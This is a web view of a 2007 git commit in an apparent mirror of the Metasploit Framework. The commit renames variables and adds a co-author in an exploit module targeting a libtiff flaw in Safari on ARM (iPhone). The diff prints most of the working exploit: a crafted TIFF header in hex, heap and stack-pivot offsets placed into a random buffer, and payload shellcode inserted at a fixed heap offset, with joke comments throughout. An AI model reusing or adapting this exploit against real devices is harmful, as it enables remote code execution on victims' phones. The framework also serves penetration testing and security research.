infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

hehe-ified. 

git-svn-id: file:///home/svn/framework3/trunk@5149 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2007-10-16 05:40:36 +00:00
parent 49a54dfb6f
commit d3c96f0b45
1 changed files with 12 additions and 15 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

27
modules/exploits/osx/armle/safari_libtiff.rb
View File

@ -31,7 +31,7 @@ class Exploits::Osx::Armle::SafariLibTIFF < Msf::Exploit::Remote
tools installed will need to use a special payload.
},
'License' => MSF_LICENSE,
'Author' => ['hdm'],
'Author' => ['hdm', 'Kevin Finisterre <kf[at]digitalmunition.com>'],
'Version' => '$Revision$',
'References' =>
[
@ -102,8 +102,8 @@ class Exploits::Osx::Armle::SafariLibTIFF < Msf::Exploit::Remote
# - https://strikecenter.bpointsys.com/articles/2007/10/10/october-2007-microsoft-tuesday
#
dlen = 0x1000
data =
lolz = 0x1000
tiff =
"\x49\x49\x2a\x00\x1e\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x08\x00\x00\x01\x03\x00"+
@ -114,26 +114,24 @@ class Exploits::Osx::Armle::SafariLibTIFF < Msf::Exploit::Remote
"\x01\x00\x00\x00\x08\x00\x00\x00\x17\x01\x04\x00"+
"\x01\x00\x00\x00\x15\x00\x00\x00\x1c\x01\x03\x00"+
"\x01\x00\x00\x00\x01\x00\x00\x00\x50\x01\x03\x00"+
[dlen].pack("V") +
[lolz].pack("V") +
"\x84\x00\x00\x00\x00\x00\x00\x00"
# Randomize the bajeezus out of our data
patt = rand_text(dlen)
hehe = rand_text(lolz)
# Were going to candy mountain!
patt[120, 4] = [target['Magic']].pack("V")
hehe[120, 4] = [target['Magic']].pack("V")
# >> add r0, r4, #0x30
patt[104, 4] = [ targ['Heap'] - 0x30 ].pack("V")
hehe[104, 4] = [ targ['Heap'] - 0x30 ].pack("V")
# Candy mountain, Charlie!
# >> mov r1, sp
# It will be an adventure!
# >> mov r2, r8
patt[ 92, 4] = [ patt.length ].pack("V")
hehe[ 92, 4] = [ hehe.length ].pack("V")
# Its a magic leoplurodon!
# It has spoken!
@ -158,7 +156,7 @@ class Exploits::Osx::Armle::SafariLibTIFF < Msf::Exploit::Remote
# We made it to candy mountain!
# Go inside Charlie!
# sub sp, r7, #0x14
patt[116, 4] = [ targ['Heap'] + 44 + 0x14 ].pack("V")
hehe[116, 4] = [ targ['Heap'] + 44 + 0x14 ].pack("V")
# Goodbye Charlie!
# ;; targ['Heap'] + 0x48 becomes the stack pointer
@ -168,13 +166,12 @@ class Exploits::Osx::Armle::SafariLibTIFF < Msf::Exploit::Remote
# >> ldmia sp!, {r4, r5, r6, r7, pc}
# Return back to the copied heap data
patt[192, 4] = [ targ['Heap'] + 196 ].pack("V")
hehe[192, 4] = [ targ['Heap'] + 196 ].pack("V")
# Insert our actual shellcode at heap location + 196
patt[196, payload.encoded.length] = payload.encoded
hehe[196, payload.encoded.length] = payload.encoded
data << patt
data
tiff << hehe
end
end